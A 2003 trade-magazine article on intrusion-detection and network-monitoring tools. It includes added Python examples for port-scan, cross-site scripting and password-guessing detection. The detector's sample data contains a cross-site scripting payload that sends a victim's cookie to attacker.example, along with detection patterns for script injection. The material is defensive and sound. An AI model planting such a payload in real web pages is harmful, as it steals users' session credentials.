Stemming the tide
Intrusion-detection and monitoring tools can help shore up your network
- By Kevin Jonah
- May 15, 2003
The networked world is an increasingly dangerous place. With the possibility of foreign governments or organizations plotting cyberterrorism, there's no end to the number of threats to operations on the LAN, WAN or Internet.
And even if you remove the threat from abroad, there are plenty of domestic hackers who'd like nothing better than to beef up their reputations by making a trophy of your Web site.
Keeping your firewall locked down is no longer enough to prevent an attack on your systems, especially in a world where Web services have become part of doing business with your constituency. And as government Web sites become the virtual equivalent of the institutions they represent, hostile hackers can gain big propaganda value out of knocking out a server or merely cutting it off from the world.
Take what happened to Al-Jazeera, the Arabic-language news network. The broadcaster had opened an English-language site dedicated to providing coverage of the war in Iraq, but the service was knocked offline by hackers.

Spam storm
On March 23, shortly after the network broadcast images of dead and captured American soldiers taken from Iraqi state television, a massive denial-of-service attack was launched against all of Al-Jazeera's sites. The flood overwhelmed its 100-Mbps Internet connection, and when Al-Jazeera doubled its bandwidth, the attack still drowned out legitimate users.
Later in the week, hackers hijacked the Domain Name System records for the site, using what was described as DNS cache poisoning, and redirected visitors to a site carrying a pro-American message. The hacker site was hosted on a Utah Internet service provider, which then bore the brunt of an antiwar denial-of-service counterattack.
Attacks such as distributed denial-of-service and DNS cache poisoning don't require an intrusion into the target network at all. A flood is mounted from other systems that have already been compromised, and a DNS attack is aimed at name servers the victim does not control. Tracking the source of these attacks is difficult at best, and traditional intrusion-detection systems, the kind that monitor access to and changes on the hosts they protect, might not even alert administrators to a problem, let alone prevent the attack.
To be successful, a cybersecurity strategy has to go beyond simply detecting intruders or monitoring network traffic.
As attacks become more distributed in nature, so must be your defenses. You need to make use of tools such as remote site monitoring and response measurement, network monitoring, and automated network management that take advantage of programmed policies and pattern recognition to launch a response to a developing threat before it takes a network or Web site offline.
System managers need to know of weaknesses in their network configurations and system software.
Hackers generally exploit bugs in software to begin an attack, whether the bugs are on the target systems or on outside systems that the hacker intends to turn into zombies, hijacked machines that launch concerted attacks against other systems at a hacker's bidding.
Attacks often are preceded by a port scan or some other probe that identifies the operating system and the services a system runs, so the attacker can pick a vulnerability to try. Careful monitoring of network traffic can reveal this reconnaissance before the follow-on attack against the vulnerable system begins.

Buggy arsenal
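One way to catch the reconnaissance described above is to watch connection records for a single source touching many distinct ports on one host in a short time. The following is an added example written for this article, not code from any product it mentions; the thresholds, the window size and the flow records are all assumptions constructed for illustration, and the slow scanner in the sample shows the limitation of a fixed window.

```python
"""Port-scan detection over connection records (added example).

A source that opens connections to many distinct destination ports on one
host inside a short window is the probing pattern described in the text.
Records are constructed here as (timestamp, src, dst, dport, tcp_flags);
a real deployment would read them from a packet capture or a flow log.
"""
from collections import defaultdict

SCAN_PORT_THRESHOLD = 10   # assumption: distinct ports from one source before alerting
SCAN_WINDOW_SECONDS = 5.0  # assumption: window inside which those ports must be touched


def detect_port_scans(records, port_threshold=SCAN_PORT_THRESHOLD,
                      window=SCAN_WINDOW_SECONDS):
    """Return (src, dst, distinct_ports, first_ts, last_ts) alerts.

    A sliding window of recent connection attempts is kept per (src, dst)
    pair; when the number of distinct destination ports inside the window
    reaches the threshold, one alert is raised for that pair.
    """
    recent = defaultdict(list)   # (src, dst) -> [(ts, dport), ...] inside the window
    alerted = set()
    alerts = []
    for ts, src, dst, dport, _flags in sorted(records):
        key = (src, dst)
        events = recent[key]
        events.append((ts, dport))
        # discard attempts that have fallen out of the window
        while events and ts - events[0][0] > window:
            events.pop(0)
        distinct_ports = {port for _, port in events}
        if len(distinct_ports) >= port_threshold and key not in alerted:
            alerted.add(key)
            alerts.append((src, dst, len(distinct_ports), events[0][0], ts))
    return alerts


# Constructed sample traffic against one Web server (203.0.113.5).
SAMPLE_RECORDS = (
    # a normal client: only ports 80 and 443, many times
    [(10.0 + i, "192.0.2.10", "203.0.113.5", 80 if i % 2 else 443, "S")
     for i in range(20)]
    # a fast scanner: ports 21..40 in two seconds
    + [(30.0 + i * 0.1, "198.51.100.7", "203.0.113.5", 21 + i, "S")
       for i in range(20)]
    # a slow scanner: 15 ports spread over a minute, never 10 inside one window
    + [(100.0 + i * 4.0, "198.51.100.9", "203.0.113.5", 1000 + i, "S")
       for i in range(15)]
)

if __name__ == "__main__":
    for src, dst, n, first, last in detect_port_scans(SAMPLE_RECORDS):
        print(f"ALERT port scan {src} -> {dst}: {n} ports in {last - first:.1f}s")
```

Only the fast scanner trips the alert. The slow scanner, which spaces its probes four seconds apart, never accumulates ten ports inside a five-second window, which is exactly why attackers pace their scans; a production detector keeps longer-lived state per source, or scores sources over several windows, to catch that case.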
Once an attacker has an idea of the potential vulnerabilities of a system, he or she can mount a variety of attacks on the system in an attempt to exploit bugs or misconfigurations. Just a few include:
- Creating a buffer overflow by sending more data than a server program is prepared to handle, so that the input overwrites memory beyond the buffer set aside for it, such as the program's own control data on the stack. The data sent in these attacks often includes code that the server ends up executing. This method has been used to exploit documented vulnerabilities in Microsoft Internet Information Services on servers that administrators left unpatched.
- Cross-site scripting and other unexpected data entry, in which hackers submit script or code as the values of Web form fields. If the site echoes the input back unfiltered, the script runs in the browser of another user, where it can redirect that user to an external site and capture data such as user names and passwords; if the server itself interprets the input, the attacker can run commands or queries on the server instead.
- Attacking systems left at their default settings, using commonly known initial passwords and configurations on Windows or other systems to gain access as a superuser.
- Brute-force attacks, using password-guessing software to try credentials until one works, and other repetitive attacks such as denial of service, which aim to crash a system or overwhelm it rather than gain access.
Intrusion-detection software is designed to sniff out incoming probes and attacks such as these and either alert a system administrator or security manager, or take some automated action to defend against the attack, or both.
Typical host-based intrusion-detection systems monitor the log files and file systems of protected computers for unauthorized changes. But in the world of Web applications and services, this approach by itself might no longer be enough to ensure the security of an organization's data or its ability to sustain operations.
New intrusion-detection systems, based on pattern recognition technology and other artificial intelligence software, now monitor the network packets themselves. They watch for signs of an incoming attack and alert administrators before there's a breach of a system that would cause the kinds of changes that a log file and file system scanner would catch.
For example, NFR Security Inc.'s NFR IDS system monitors network traffic and performs network analysis, watching for the signature of an attack or for parameters that might indicate an unknown type of attack. It can generate Simple Network Management Protocol traps and events in other management software packages that trigger preprogrammed measures to be taken; it also can send alerts to an administrator's workstation, and e-mail to designated addresses to warn them.
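The two kinds of checks an IDS like the one described above performs, matching packet contents against attack signatures and watching parameters that fall outside normal bounds, can be shown against the attacks listed earlier. What follows is an added example written for this article; it is not NFR's code or any vendor's, and the request records, thresholds and patterns are constructed assumptions. It inspects each request for an overlong request line (the shape of a buffer-overflow attempt) and for script in form fields (cross-site scripting), and counts failed logins per source to spot password guessing.

```python
"""Signature and rate-based alerting over HTTP request records (added example).

Per-request checks: a request line longer than the protected server should
ever see, and script-like content in form fields.
Cross-request check: many failed logins from one source inside a window.
Alerts are returned as dicts; a real system would turn them into SNMP traps,
console messages or e-mail as the text describes.
"""
import re
from collections import defaultdict

MAX_REQUEST_LINE = 1024        # assumption: longest request line the server legitimately needs
XSS_PATTERN = re.compile(r"<\s*script\b|javascript\s*:|\bon[a-z]+\s*=", re.IGNORECASE)
LOGIN_FAIL_THRESHOLD = 5       # assumption: failed logins from one source before alerting
LOGIN_WINDOW_SECONDS = 60.0    # assumption: window in which those failures are counted


def inspect_request(req):
    """Signature and parameter checks on a single request record."""
    alerts = []
    line = req["request_line"]
    if len(line) > MAX_REQUEST_LINE:
        alerts.append({"ts": req["ts"], "src": req["src"],
                       "rule": "overlong-request-line", "detail": f"{len(line)} bytes"})
    for field, value in req.get("form", {}).items():
        if XSS_PATTERN.search(value):
            alerts.append({"ts": req["ts"], "src": req["src"],
                           "rule": "script-in-form-field", "detail": field})
    return alerts


def detect_password_guessing(requests, threshold=LOGIN_FAIL_THRESHOLD,
                             window=LOGIN_WINDOW_SECONDS):
    """Alert once per source that fails login `threshold` times inside `window`."""
    failures = defaultdict(list)   # src -> timestamps of recent failed logins
    alerted = set()
    alerts = []
    for req in sorted(requests, key=lambda r: r["ts"]):
        if not (req["request_line"].startswith("POST /login") and req["status"] == 401):
            continue
        stamps = failures[req["src"]]
        stamps.append(req["ts"])
        while stamps and req["ts"] - stamps[0] > window:
            stamps.pop(0)
        if len(stamps) >= threshold and req["src"] not in alerted:
            alerted.add(req["src"])
            alerts.append({"ts": req["ts"], "src": req["src"], "rule": "password-guessing",
                           "detail": f"{len(stamps)} failed logins in {window:.0f}s"})
    return alerts


def run_detectors(requests):
    """Run both detectors and return all alerts ordered by time."""
    alerts = []
    for req in requests:
        alerts.extend(inspect_request(req))
    alerts.extend(detect_password_guessing(requests))
    return sorted(alerts, key=lambda a: a["ts"])


# Constructed sample traffic: one normal page view, one overflow-style request,
# one guestbook post carrying script, one benign post, and two login sequences.
SAMPLE_REQUESTS = [
    {"ts": 1.0, "src": "192.0.2.10", "request_line": "GET /index.html HTTP/1.1", "status": 200},
    {"ts": 2.0, "src": "198.51.100.7",
     "request_line": "GET /" + "A" * 3000 + " HTTP/1.0", "status": 400},
    {"ts": 3.0, "src": "198.51.100.8", "request_line": "POST /guestbook HTTP/1.1", "status": 200,
     "form": {"name": "bob",
              "comment": "<script>document.location='http://attacker.example/?c='"
                         "+document.cookie</script>"}},
    {"ts": 4.0, "src": "192.0.2.11", "request_line": "POST /guestbook HTTP/1.1", "status": 200,
     "form": {"name": "alice", "comment": "nice site <b>really</b>"}},
] + [
    {"ts": 10.0 + i, "src": "198.51.100.9", "request_line": "POST /login HTTP/1.1", "status": 401}
    for i in range(8)
] + [
    {"ts": 20.0, "src": "192.0.2.12", "request_line": "POST /login HTTP/1.1", "status": 401},
    {"ts": 25.0, "src": "192.0.2.12", "request_line": "POST /login HTTP/1.1", "status": 200},
]

if __name__ == "__main__":
    for alert in run_detectors(SAMPLE_REQUESTS):
        print(f"{alert['ts']:6.1f} {alert['src']:<14} {alert['rule']:<24} {alert['detail']}")
```

The signature checks fire on the single request that carries them, which is what lets a network sensor warn before the server is touched; the password-guessing rule only fires on the fifth failure from one address, so a user who mistypes once is never reported. The script pattern is deliberately narrow; a real sensor carries many more signatures and also normalizes encodings, since attackers hide `<script>` behind URL or Unicode escapes to slip past exactly this kind of match.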
But even this level of intelligence might not be enough to stop attacks that aim to deny access to a network rather than breach its defenses in the traditional way. That is why many organizations pair an IDS with external network monitoring, which measures availability and response time from outside the network and so can detect the effects of a denial-of-service attack faster.
Kevin Jonah, a Maryland network manager, writes about computer technology.